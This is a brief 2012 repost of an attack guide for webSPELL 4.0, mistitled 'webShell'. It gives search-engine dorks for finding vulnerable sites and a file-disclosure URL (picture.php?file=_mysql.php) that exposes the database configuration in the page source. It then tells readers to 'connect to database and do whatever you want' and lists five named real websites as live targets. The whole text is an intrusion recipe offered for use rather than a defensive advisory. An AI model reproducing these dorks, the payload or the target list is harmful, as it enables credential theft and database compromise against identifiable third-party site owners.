webShell remote Configuration excution

webShell 4.O remote Configuration excution

vulnerable url : http://website.com/picture.php?file=_mysql.php
             cats.jpg (246×125)
Dorks : ext:php intitle:webSPELL v4.0
            “inurl:/picture.php?file=”

Find  vulnerable website and goto  http://website.com/picture.php?file=_mysql.php

you’ll get a Blanck Page 
press ctrl+U and view source 
you’ll find something like this 

Now connect to database and do whatever you want
Live demo : 

http://www.echoes-guild.com/picture.php?file=_mysql.php
http://www.crazyfungamer.de/picture.php?file=_mysql.php 
http://www.dj-pedrofernandez.de/cgi//picture.php?file=_mysql.php
http://r0fld2.uw.hu/picture.php?file=_mysql.php
http://www.street.clanfusion.de/picture.php?file=_mysql.php

Read more: webShell remote Configuration excution

Story added 24. May 2012, content source with full text you can find at link above.